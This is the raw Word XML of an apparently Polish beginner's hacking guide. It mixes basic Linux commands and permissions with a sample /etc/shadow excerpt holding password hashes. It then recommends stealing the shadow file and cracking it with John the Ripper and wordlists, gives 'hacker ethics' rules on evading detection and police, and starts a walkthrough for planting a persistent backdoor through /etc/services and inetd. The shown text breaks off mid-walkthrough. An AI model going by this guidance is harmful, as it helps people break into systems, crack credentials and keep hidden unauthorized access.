          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - pisanie do innego zalogowanego użytkownika </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New CE" w:hAnsi="Courier New CE" w:eastAsia="Courier New CE" w:cs="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">xhost </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>- program zezwalający na korzystanie z serwera X Window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 przykładzie wyglądać będzie to ta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t;jerry@sunnet jerry&gt;$ whoam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jerr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t;jerry@sunnet jerry&gt;$ wh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jerry    tty1  april 19 2:3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ls -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otal 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rwxr-x---  2 jerry   users   512 Apr 11 12:11 artykul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rwxr-xr-x  2 jerry   users   512 Apr 11 18:22 gr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rwxr-x---  8 jerry   users   512 Apr 11 08:44 mai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rwxr-xr-x  4 jerry   users   512 Apr 11 12:30 waz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w-r--r--  1 jerry   jerry   159 Apr 19 02:30 .bash_histor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iersz pierwszy podaje nam aktualnie całkowitą objętość dysku zajmowaną przez nasze pliki i katalog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 następnej lini widzim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rwxr-x---  7 jerry   users   512 Jul 11 22:47 artykul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gdz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drwxr-x---</w:t>
      </w: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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t>prawa i rodzaje plików, katalogów</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jerry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>właściciel pliku, katalog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users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>grupa dostepu do pliku, katalog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512</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>rozmiar danych plików, katalogów w bajta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Apr 11 12:11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t>dokładna data i czas zmiany pliku, katalog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niżej przedstawie dokładniej opis praw i rodzajów plików, katalogó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r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - uprawnienie do odczytania plik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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - uprawnienie do zapisania (modyfikacji) plik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x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - uprawnienia do wykoniania plik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k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - rodzaj kategorii ('</w:t>
      </w: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plik, '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>' katalog, '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>' wskaznik)</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s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - bit SUID (ustawienie go powoduje, że dostęp do pliku moż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miec tylko jeden użytkownik)</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g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - bit SGID (ustawienie dla katalogu, powoduje, że pliki </w:t>
        <w:tab/>
        <w:t xml:space="preserve">    tworzone w tym katalogu będą należały do tej samej grupy, do </w:t>
        <w:tab/>
        <w:t xml:space="preserve">    której należy katalog, a nie do grupy do ktorej należ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właściciel plik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t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - bit sticky (ustawienie go powoduje, że program po wykonaniu </w:t>
        <w:tab/>
        <w:t xml:space="preserve">    nie jest usowany z pamięci)</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k| |r|w|x|r|w|x|r|w|x|</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      |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      |      \uprawnienia dla pozostłlych użytkowników (others)</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      \uprawnienia dla grupy (group)</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uprawnienia dla właściciela (owner)</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rodzaj kategorii (plik, katalog, wskażnik, urządzenia itp. itd.)</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 tak przedstawia się znaczenie bitów w słowie, zawierajacym prawa dostep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s|g|t| |r|w|x|r|w|x|r|w|x|</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      |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      |      \uprawnienia dla pozostałych użytkowników</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      \uprawnienia dla grupy</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uprawnienia dla właściciela</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uprawnienia specjal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Wszystkie ustawienia plików i katalogów ustawiamy za pomocą polecenia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>chmod who+</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r</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w</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x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>, gdzie who oznacz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u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>-user  (użytkownik, właścicie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g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>-group (grup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o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>-other (inni użytkownic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a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>-all   (wszysc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akże możemy nadać właściwości w formie liczbowej, tj n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chmod 740 [pli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tóry nadaje uprawnienia do pisania, czytania, zapisywania i wykonywania pliku właścicielowi; dla grupy tylko czytanie a pozostałym zabiera wszystkie uprawnieni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r|w|x|r|w|x|r|w|x| pełne uprawnienia dla wszystkich</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4+2+1 4+2+1 4+2+1</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xml:space="preserve">7     7     7    czyli </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>chmod 777 [plik]</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r|w|x|r|w|-|-|-|-| pełne uprawnienia dla właściciela, prawo czytania i</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pisania dla grupu</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4+2+1 4+2+0 0+0+0</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xml:space="preserve">7     6     0    czyli </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>chmod 760 [plik]</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r|-|-|-|-|-|r|w|-| uprawnienie do czytania dla właściciela oraz prawo do</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czytania i pisania dla innych użytkowników</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New CE" w:hAnsi="Courier New CE" w:eastAsia="Courier New CE" w:cs="Courier New CE"/>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4+0+0 0+0+0 4+2+0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New CE" w:hAnsi="Courier New CE" w:eastAsia="Courier New CE" w:cs="Courier New CE"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">4     0     6    czyli </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>chmod 406 [plik]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New CE" w:hAnsi="Courier New CE" w:eastAsia="Courier New CE" w:cs="Courier New CE"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New CE" w:hAnsi="Courier New CE" w:eastAsia="Courier New CE" w:cs="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Dalej proponuję odwołać się do polecenia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>man</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> który wywołany z jakimś poleceniem da nam </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>szegółową pomoc na temat konkretnego polecenia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New CE" w:hAnsi="Courier New CE" w:eastAsia="Courier New CE" w:cs="Courier New CE"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>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 xml:space="preserve">&lt;jerry@sunnet jerry&gt;$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>man [polecen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o dobrze. Mamy konto, mamy haslo no ale gdzie właśnie zapisywane jest to hasło? Typowe hasła linuxowskie zapisywane są do dwóch plikó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etc/passwd</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etc/shado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W pliku </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> znajdziemy taki przykładowy wpi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oot:x:0:0::/root:/bin/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ync:x:5:0:sync:/sbin:/bin/syn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x:1:1:bin:/bi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tp:x:404:1::/home/ftp:/bin/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aemon:x:2:2:daemon:/sbi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dm:x:3:4:adm:/var/ad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p:x:4:7:lp:/var/spool/lp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il:x:8:12:mail:/var/spool/mai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ostmaster:x:14:12:postmaster:/var/spool/mail:/bin/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ews:x:9:13:news:/usr/lib/new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ucp:x:10:14:uucp:/var/spool/uucppubli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n:x:13:15:man:/usr/ma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games:x:12:100:games:/usr/game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guest:x:405:100:guest:/dev/null:/dev/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oxy:x:406:406:proxy:/dev/null:/dev/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pp:x:407:17:PPP:/home/others/ppp:/usr/sbin/ppp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rcd:x:408:19:IRC daemon:/dev/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obody:x:65534:100:nobody:/dev/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john:1000:100:John:/home/john:/bin/tc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lan:x:1001:500:Alan:/home/pracownicy/alan:/bin/tc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eddy:x:1005:550:Tomasz Lorkiewicz:/home/net/teddy:/bin/tc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zyl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login:password:uid:gid:comment:home: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ierwsza pozycja określa login stosowany przy logowaniu do system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stępnie jest miejsce na hasło (jeżli jest puste, to przy wpisywani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hasła podczas logowania wystarczy wcisnąć ENTER!), trzecie pole to tz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User Id (UID), czwarte pole to Group Id (GID), piąte pole, to pole opisu, następne wskazuje na katalog domowy użytkownika, a ostatnie na powłokę.</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W miejscu hasła zazwyczaj jest postawiony </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> co zwykle oznacza, że hasła są shadowane. Co to oznacza? Oznacza to, że takie hasła są zapisywane do pliku </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> a dostęp do niego ma tylko roo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Tak zaś przykładowo wygląda plik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>/etc/shado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root:$1$.oj29fgs$HXiO8XBXdaYNLUhUfcFYu/:11009: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llan:$1$ILM1ueyN$bKttYwoY8FWX1tUfL3ifa1:10952:0:99999:7:::</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eddy:$1$1nY7ssNX$P08/3jUliUGtvRIINN/xb/:11044:0:99999:7:::</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 tu pojawia się problem! Jednym z zadan Hakera jest dostanie się do pliku /etc/shadow. Jest to dość trudne, zważywszy na to, że pojawiają się to coraz nowsze upgrady dla linuxów które są pozbawione jakich kolwiek dziór. Ale i tak "Światowa Elita" daje sobie z tym radę.</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żeli już mamy shadowany plik to teraz trzeba poznać hasłą użytkowników. Przyjazny dla nas będzie program do łamania właśnie takich haseł. Do tego celu służą programy takie jak John the rippe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iller Crack i Craker Jack. Polecam korzystać z Johna, ale każdy wybierze to co chce - wybór zostawiam Tobie. Nie będe już opisywał kwesti odpalania i konfiguracji tych programów - wszystko znajdziecie w instrukcji wraz z nimi. Na koniec powiem tylko tyle, że łamanie takich haseł jest bardzo czasochłonne, a bez bardzo dobrego słownika nie wiem czy złamiecie 40% haseł. Słowników jest masa w necie więc radzę dobrze poszukać. Ale nie martwcie się - hasła w stylu: warszawa4, trypolis, anka123, szatan itp są bardzo łatwymi hasłami więc Wasz łamacz nie będzie z nimi miał większych problemów. Schody zaczynają sie dopiero gdy do złamania wpada hasło w stylu B-mc$!,1c($,QD#^ alb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1$*vW$,vS}|}@ it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ie będe rozpisywał się więcej na temat podstawowych wiadomości w linuxie. Przypominam i proponuję ściągnąć sobie HACKERS FAQ - Pomoc dla początkujących Hackerów. Bardzo szczegółowy opis najczęściej używanych komend i poleceń.</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Etyka Hakerska &lt;&lt;</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Jeżeli chcesz być prawdziwym hackerem, musisz przestrzegać kilku ważnych zasad.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to o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1.  Nigdy nie uszkadzaj systemu do którego się włamujesz.</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2.  Nigdy nie zmieniaj plików systemowych, oprócz tych które </w:t>
        <w:tab/>
        <w:t xml:space="preserve">powinieneś zabezpieczyć, aby nie zostać wykrytym i tych które sam </w:t>
        <w:tab/>
        <w:t>zabezpieczyłeś, zby zyskać bezpieczny dostęp w przyszłośc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3.  Nigdy nie zmieniaj haseł, na kogoś koncie, bo mogą zajść </w:t>
        <w:tab/>
        <w:t>podejrzenia i długo nie nacieszysz się tym konte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4.  Prawdziwy hacker jest bardzo cierpliwy. Poświęci dużo czasu, aby </w:t>
        <w:tab/>
        <w:t>złamać chociaż jedno zakichane konto (hasł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5.  Nie czytaj czyjejś poczty, a jeżeli masz już taką potrzebę to </w:t>
        <w:tab/>
        <w:t xml:space="preserve">conajmniej zostaw ją na serwerze, aby właściciel konta też mógł </w:t>
        <w:tab/>
        <w:t>ją przeczytać.</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6.  Nie mów nikomu o swoich czynach, nawet kumplą którym ufasz. </w:t>
        <w:tab/>
        <w:t>Kiedyś mogą cię zdradzić.</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7.  Co do zasady nr. 6: Nie ufaj nikomu!!! Możesz zaufać tylko sob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8.  Nigdy nie używaj przwdziwych imion, nazwiska, numeru telefonu </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(szczególnie uważać na telefon, jeżeli ktoś go zdobędzie wie już </w:t>
        <w:tab/>
        <w:t xml:space="preserve">o tobie wszystko). Najlepiej używać imoion kobiecych, są mniej </w:t>
        <w:tab/>
        <w:t>podejrza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9.  Nie mów o swoich planach przez telefon domowy, ktoś na centrali </w:t>
        <w:tab/>
        <w:t>może cię podsłuchać.</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10. Zostaw system w takim stanie jakim go zastałeś.</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11. Bądź przezorny, aż do przesady, trzymaj wszystkie materiały w </w:t>
        <w:tab/>
        <w:t>bezpiecznym miejsc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12. Zabezpieczaj się przed przyjściem policji. Nie trzymaj nigdy </w:t>
        <w:tab/>
        <w:t xml:space="preserve">ważnych informacji na twardzielu. Staraj się wszystko przegrywać </w:t>
        <w:tab/>
        <w:t>na dyskietki i schować je w bezpieczne miejsc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13. Aby stać się prawdziwym hackerem musisz hackować, a nie siedzieć </w:t>
        <w:tab/>
        <w:t xml:space="preserve">i tylko czytać, albo przywłaszczać sobie czyjeś osiągnięcia. </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t;&gt; Co to jest BACKDOOR? &lt;&l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BACKDOOR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> to tzw. tylnie drzwi które umożliwiają nam na dostanie się do systemu z pominięciem konieczności logowania lub z ominięciem zabezpieczeń. Jest wiele sposobów na zrobienie właśnie takiego backdoora. Ale o co w tym wszystkim chodzi? A no o to, że w chwili dostania się na jakiś serwer, po zdobyciu roota przydałoby się jeszcze jakoś go utrzymać. Możemy wtedy wykorzystać technikę backdoora na specjlany port telnetu, można go dopisać do crona lub zrobić sobie suid root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Przykłady postawienia BACKDOORsów &lt;&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niżej przedstawię sposób na postawienie backdoora na specjalny por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y postawić backdoora musimy przeglądnąć dwa następujące plik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etc/services</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etc/inetd.conf</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Zaczynamy od przeglądnięcia pliku </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>/etc/service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t;jerry@sunnet jerry&gt;# cat /etc/service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cpmux</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>1/tcp</w:t>
        <w:tab/>
        <w:tab/>
        <w:t># TCP port service multiplex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w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>7/tc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w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>7/ud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iscard</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>9/tcp</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>sink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iscard</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>9/udp</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>sink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ystat</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>11/tcp</w:t>
        <w:tab/>
        <w:t>user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aytime</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>13/tc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aytime</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>13/ud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etstat</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>15/tc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qotd</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>17/tcp</w:t>
        <w:tab/>
        <w:t>quot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sp</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>18/tcp</w:t>
        <w:tab/>
        <w:t># message send protoco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sp</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>18/udp</w:t>
        <w:tab/>
        <w:t># message send protoco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gen</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>19/tcp</w:t>
        <w:tab/>
        <w:t>ttytst sourc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gen</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>19/udp</w:t>
        <w:tab/>
        <w:t>ttytst sourc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ftp-data        </w:t>
        <w:tab/>
        <w:t>20/tcp      # File Transfer [Default Dat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ftp-data        </w:t>
        <w:tab/>
        <w:t>20/udp      # File Transfer [Default Dat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ftp             </w:t>
        <w:tab/>
        <w:t>21/tcp      # File Transfer [Contro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ftp             </w:t>
        <w:tab/>
        <w:t>21/udp      # File Transfer [Contro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ssh             </w:t>
        <w:tab/>
        <w:t>22/tcp      # Secure Shell Logi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ssh             </w:t>
        <w:tab/>
        <w:t>22/udp      # Secure Shell Logi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telnet          </w:t>
        <w:tab/>
        <w:t>23/tc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telnet          </w:t>
        <w:tab/>
        <w:t>23/ud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niej więcej to wygląda tak. W tym pliku znajdziesz informacje na temat używanych aktualnie portów przez linuxa. Dzięki tym informacją możesz bez problemu postawić backdoora na jakiś już istniejący port lub możesz dopisać swój własny. Teraz zajmijmy się analizą jednej z linijek n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tp</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>21/tcp</w:t>
        <w:tab/>
        <w:t># File Transfer [Default Dat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ierwsza kolumna oznacza nazwę serwisu w systemie (tylko w celu pomocniczym). Druga to numer portu, na którym znajduje się aktualna usługa (więc gdy wpiszemy "telnet localhost ftp" to zostaniemy połączeni z portem 21). Zaraz po porcie znajduje się nazwa protokołu, z reguły interesuje nas tcp. Ostatnia kolumna to komentarz, najczesciej opis przeznaczeni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Teraz patrzymy co się kryje w </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
